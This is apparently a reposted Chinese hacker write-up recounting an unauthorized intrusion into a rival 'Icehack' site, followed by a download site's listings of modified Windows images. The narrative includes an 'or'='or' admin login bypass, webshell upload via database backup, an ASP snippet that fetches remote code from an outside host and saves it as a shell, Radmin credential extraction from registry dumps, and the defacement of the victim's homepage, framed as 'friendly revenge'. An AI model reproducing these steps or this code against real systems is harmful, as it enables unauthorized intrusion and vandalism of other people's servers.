渗透冰兰黑客基地
注:本人已经提交到C.R.S.T ,适合新人学习..
首先是有个朋友对我说有个冰兰黑客基地,转载别人的文章还不著名作者,之后还蒙骗别人说他们能入侵国外站点. 所以就想检测一下.
首先看了以下他的站点,主站和论坛.分别在不同的服务器.
主站是新云的,虽然爆出很多漏洞,但是毕竟人家也是玩黑的,所以不期望能从程序漏洞拿了..
论坛是php的.没仔细看,决定渗透了.
一:点兵
拿出旁注
地址:http://www.icehack.cn
IP:XX.X.XX.X(忘记了...)
挖靠,N多站点....
最后选择了一个公司的站点,有注射点,但是不显示错误,手工猜解是asc数据库 ...
拿出HDSI扫后台,扫到后台地址为http://www.XXXXX.com/Product/manage/Manage.asp
到这里的时候直接用'or'='or' 试了下. 进去了..
有数据库备份和恢复. 直接传jpg的木马(大马).传不上去,可能限制了大小.
之后换小马,红狼1K大的小马,传好后备份.成功.
二:士气
小马传好了,各位一定认为直接传大马 ,之后就是提权的事了吧.可惜好事多磨...
传好小马之后我直接传个大马上传,但是如图1
提示错误:很抱歉,由于您提交的内容中或访问的内容中含有系统不允许的关键词,本次操作无效,系统已记录您的IP及您提交的所有数据。请注意,不要提交任何违反国家规定的内容!本次拦截的相关信息为:98424b88afb8
我以为换个大马就可以了,之后换了N个,国内的,国外的都试了.我想可能是禁止提交了,但是我提交几个字都可以提交上去,到这里,我快放弃了。
但是忽然想到一哥们(烟,灭在雪里)的方法.具体如下:
提交代码
<%
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://www.hackerchina.cn/1.txt",False
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile Server.MapPath("1.asp"),2
set sGet = nothing
set sPOST = nothing
%>
利用服务器的XML和数据流组件,从我的blog的1.txt的内容下载到目标站点根目录并保存为1.asp.
我提交这段代码,保存为3.asp ,之后访问,显示空白.
之后访问1.asp.如图
,成功了..
三 出征
已经拿到了一个webshell,就剩下提权了,但是提权一般难度要比webshell还难.如何呢?
WEB服务器版本Microsoft-IIS/6.0
Scripting.FileSystemObject √ 文件操作组件
wscript.shell × 命令行执行组件
ADOX.Catalog √ ACCESS建库组件
JRO.JetEngine √ ACCESS压缩组件
Scripting.Dictionary √ 数据流上传辅助组件
Adodb.connection √ 数据库连接组件
Adodb.Stream √ 数据流上传组件
SoftArtisans.FileUp × SA-FileUp 文件上传组件
LyfUpload.UploadFile × 刘云峰文件上传组件
Persits.Upload.1 √ ASPUpload 文件上传组件
JMail.SmtpMail √ JMail 邮件收发组件
CDONTS.NewMail × 虚拟SMTP发信组件
SmtpMail.SmtpMail.1 × SmtpMail发信组件
wscript.shell × 命令行执行组件被删除.
装了servU6.3 但是找不路径,没有权限访问.不可跨目录,
只有C:\Program Files C:\Documents and Settings可访问,装了麦咖啡,
(感谢伤心的鱼)一兄弟告诉我本地溢出,baidu了下都是控件的,感觉麻烦..
继续找别的突破口,忽然看到有radmin 目录,哈哈,高兴,看来装了radmin.
扫描了下端口,竟然没开43958.算了,读取下注册表 读取不了.但是radmin的目录下有3个注册表文件,下载回来研究。
四 得胜
windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEMAdmin]
[HKEY_LOCAL_MACHINE\SYSTEMAdmin\v2.0]
[HKEY_LOCAL_MACHINE\SYSTEMAdmin\v2.0\Server]
[HKEY_LOCAL_MACHINE\SYSTEMAdmin\v2.0\Server\iplist]
[HKEY_LOCAL_MACHINE\SYSTEMAdmin\v2.0\ServertUsers]
"1"=hex:24,00,00,00,00,00,00,00,1f,00,00,00,01,05,00,00,00,00,00,05,15,00,00,\
00,99,c8,3d,4a,e9,e2,9b,3a,e1,64,8a,f8,f1,03,00,00,24,00,00,00,00,00,00,00,\
1f,00,00,00,01,05,00,00,00,00,00,05,15,00,00,00,99,c8,3d,4a,e9,e2,9b,3a,e1,\
64,8a,f8,ec,03,00,00,24,00,00,00,00,00,00,00,1f,00,00,00,01,05,00,00,00,00,\
00,05,15,00,00,00,99,c8,3d,4a,e9,e2,9b,3a,e1,64,8a,f8,f4,01,00,00
[HKEY_LOCAL_MACHINE\SYSTEMAdmin\v2.0\Server\Parameters]
"NTAuthEnabled"=hex:00,00,00,00
"Port"=hex:fe,ff,00,00
"Timeout"=hex:0a,00,00,00
"EnableLogFile"=hex:01,00,00,00
"LogFilePath"="c:\logfile.txt"
"FilterIp"=hex:00,00,00,00
"DisableTrayIcon"=hex:00,00,00,00
"AutoAllow"=hex:00,00,00,00
"AskUser"=hex:00,00,00,00
"EnableEventLog"=hex:01,00,00,00
"Parameter"=hex:b3,8f,17,d7,f9,4e,cb,96,11,26,42,bf,29,cd,a6,86
windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\SoftwareAdmin]
[HKEY_CURRENT_USER\SoftwareAdmin\v2.0]
[HKEY_CURRENT_USER\SoftwareAdmin\v2.0\Parameters]
"showbw"=hex:01,00,00,00
"ViewType"=hex:00,00,00,00
"ConnectionMode"=hex:49,9c,00,00
"xsize"=hex:77,01,00,00
"ysize"=hex:47,01,00,00
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWAREAdmin]
[HKEY_LOCAL_MACHINE\SOFTWAREAdmin\v1.01]
[HKEY_LOCAL_MACHINE\SOFTWAREAdmin\v1.01\ViewType]
"Data"=hex:35,e3,db,da,7c,ef,32,ad,2c,a5,b8,1a,4b,e2,b2,47,7b,1d,eb,05,4c,36,\
0e,65,8a,ff,ec,aa,7d,63,a1,47,50,db,f2,0a,c5,a7,1d,dd,08,6b,7f,02,90,2b,b8,\
6c,da,7a,96,cb,dc,c9,e2,1a,8c,4d,25,39,57,f8,ee,83
以上是注册表文件的内容,
提权的步骤 感谢 fhod 支持.
3个注册表在本地运行之后,然后本地打开radmin设置,发现端口为65534
但是密码是32位MD5,麻烦.怎么破呢..
用星号密码查看器查看为 reityewi
,连接.....................连接不上...郁闷了..
后来才知道星号密码查看器 看到的都是这个reityewi....
后来,baidu了下.找到一篇文章是直接破解radmin控制端.
地址:http://www.hackerchina.cn/index/blog/post/123.html
之后连接radmin....ok.连接上了..
五 收兵
直接找到iis.
中间还有个小插曲...
管理员登陆了3389.这里再次感谢fhod,(和管理员比速度)...
打开iis,找到冰兰的站点,之后传了大马上去.如图.
呵呵 之后修改了首页,但是并没有对数据进行删除,算是带点报复的友情检测
再次感谢 伤心的鱼 fhod 烟,灭在雪里提供技术支持.
推荐系统
番茄花园 Windows 10 极速企业版 版本1903 2022年7月(32位) ISO镜像快速下载
语言:中文版系统大小:3.98GB系统类型:Win10番茄花园 Windows 10 32位极速企业版 v2022年7月 一、系统主要特点: 使用微软Win10正式发布的企业TLSB版制作; 安装过程全自动无人值守,无需输入序列号,全自动设置; 安装完成后使用Administrator账户直接登录系统,无需手动设置账号。 安装过程中自动激活
新萝卜家园电脑城专用系统 Windows10 x86 企业版 版本1507 2022年7月(32位) ISO镜像高速下载
语言:中文版系统大小:3.98GB系统类型:Win10新萝卜家园电脑城专用系统 Windows10 x86企业版 2022年7月 一、系统主要特点: 使用微软Win10正式发布的企业TLSB版制作; 安装过程全自动无人值守,无需输入序列号,全自动设置; 安装完成后使用Administrator账户直接登录系统,无需手动设置账号。 安装过程
笔记本&台式机专用系统 Windows10 企业版 版本1903 2022年7月(32位) ISO镜像快速下载
语言:中文版系统大小:3.98GB系统类型:Win10笔记本台式机专用系统 Windows 10 32位企业版 v2022年7月 一、系统主要特点: 使用微软Win10正式发布的企业TLSB版制作; 安装过程全自动无人值守,无需输入序列号,全自动设置; 安装完成后使用Administrator账户直接登录系统,无需手动设置账号。 安装过
笔记本&台式机专用系统 Windows10 企业版 版本1903 2022年7月(64位) 提供下载
语言:中文版系统大小:3.98GB系统类型:Win10笔记本台式机专用系统 Windows10 64专业版 v2022年7月 一、系统主要特点: 使用微软Win10正式发布的专业版制作; 安装过程全自动无人值守,无需输入序列号,全自动设置; 安装完成后使用Administrator账户直接登录系统,无需手动设置账号。 安装过程中自动
雨林木风 Windows10 x64 企业装机版 版本1903 2022年7月(64位) ISO镜像高速下载
语言:中文版系统大小:3.98GB系统类型:Win10新雨林木风 Windows10 x64 企业装机版 2022年7月 一、系统主要特点: 使用微软Win10正式发布的企业TLSB版制作; 安装过程全自动无人值守,无需输入序列号,全自动设置; 安装完成后使用Administrator账户直接登录系统,无需手动设置账号。 安装过程中自动激活
深度技术 Windows 10 x64 企业版 电脑城装机版 版本1903 2022年7月(64位) 高速下载
语言:中文版系统大小:3.98GB系统类型:Win10深度技术 Windows 10 x64 企业TLSB 电脑城装机版2022年7月 一、系统主要特点: 使用微软Win10正式发布的企业TLSB版制作; 安装过程全自动无人值守,无需输入序列号,全自动设置; 安装完成后使用Administrator账户直接登录系统,无需手动设置账号。 安装过程
电脑公司 装机专用系统Windows10 x64 企业版2022年7月(64位) ISO镜像高速下载
语言:中文版系统大小:3.98GB系统类型:Win10电脑公司 装机专用系统 Windows10 x64 企业TLSB版2022年7月一、系统主要特点: 使用微软Win10正式发布的企业TLSB版制作; 安装过程全自动无人值守,无需输入序列号,全自动设置; 安装完成后使用Administrator账户直接登录系统,无需手动设置账号。 安装过
新雨林木风 Windows10 x86 企业装机版2022年7月(32位) ISO镜像高速下载
语言:中文版系统大小:3.15GB系统类型:Win10新雨林木风 Windows10 x86 专业版 2022年7月 一、系统主要特点: 使用微软Win10正式发布的专业版制作; 安装过程全自动无人值守,无需输入序列号,全自动设置; 安装完成后使用Administrator账户直接登录系统,无需手动设置账号。 安装过程中自动激活系统,无
相关文章
- 笔记本无线网连不上怎么办?
- 推荐:对FCBLOG的简单分析
- Windows8网络配置出错导致不能上网如何重新启用以太网
- 利用sohu网站URL跳转漏洞欺骗邮箱密码
- 添加删除程序打不开怎么办 添加删除程序报错解决办法
- 微软MSDN大漏洞 非订阅用户也能下载原版Windows/Office 2016
- win7无法访问局域网提示0x80070035找不到网络路径怎么办?
- Yahoo! 统计功能跨站脚本漏洞
- win10系统开机需修复网络才能上网的原因及两种解决方法图文教程
- 路由器防止ARP欺骗的设置步骤
- ECShop网店系统<=V2.6.2 后台拿webshell
- 你知道自己的电脑感染了恶意软件吗?
- 黑客眼中的追踪技术 像素追踪技术(Pixel tracking)
- Cisco Unified Communications 远程命令执行漏洞
热门系统
- 1华硕笔记本&台式机专用系统 GhostWin7 32位正式旗舰版2018年8月(32位)ISO镜像下载
- 2雨林木风 Ghost Win7 SP1 装机版 2020年4月(32位) 提供下载
- 3深度技术 Windows 10 x86 企业版 电脑城装机版2018年10月(32位) ISO镜像免费下载
- 4电脑公司 装机专用系统Windows10 x86喜迎国庆 企业版2020年10月(32位) ISO镜像快速下载
- 5深度技术 Windows 10 x86 企业版 六一节 电脑城装机版 版本1903 2022年6月(32位) ISO镜像免费下载
- 6深度技术 Windows 10 x64 企业版 电脑城装机版2021年1月(64位) 高速下载
- 7新萝卜家园电脑城专用系统 Windows10 x64 企业版2019年10月(64位) ISO镜像免费下载
- 8新萝卜家园 GhostWin7 SP1 最新电脑城极速装机版2018年8月(32位)ISO镜像下载
- 9电脑公司Ghost Win8.1 x32 精选纯净版2022年5月(免激活) ISO镜像高速下载
- 10新萝卜家园Ghost Win8.1 X32 最新纯净版2018年05(自动激活) ISO镜像免费下载
热门文章
常用系统
- 1电脑公司 装机专用系统Windows10 x86新春特别 企业版 版本1507 2022年2月(32位) ISO镜像快速下载
- 2笔记本&台式机专用系统 Windows10 元旦特别 企业版 版本1903 2022年1月(64位) 提供下载
- 3深度技术 Windows 10 x64 企业版 电脑城装机版 版本1903 2022年3月(64位) 高速下载
- 4新雨林木风 Windows10 x86 企业装机版2021年10月(32位) ISO镜像高速下载
- 5电脑公司 装机专用系统Windows10 x64 企业版2021年1月(64位) ISO镜像高速下载
- 6新萝卜家园Ghost Win8.1 X64位 纯净版2020年10月(自动激活) ISO镜像高费下载
- 7新雨林木风 Windows10 x86 企业装机版2020年1月(32位) ISO镜像高速下载
- 8番茄花园 Windows 10 极速企业版 2021年3月(32位) ISO镜像快速下载
- 9深度技术Ghost Win8.1 x32位 特别纯净版2018年04(免激活) ISO镜像快速下载
- 10新萝卜家园Ghost Win8.1 X64位 纯净版2020年7月(自动激活) ISO镜像高费下载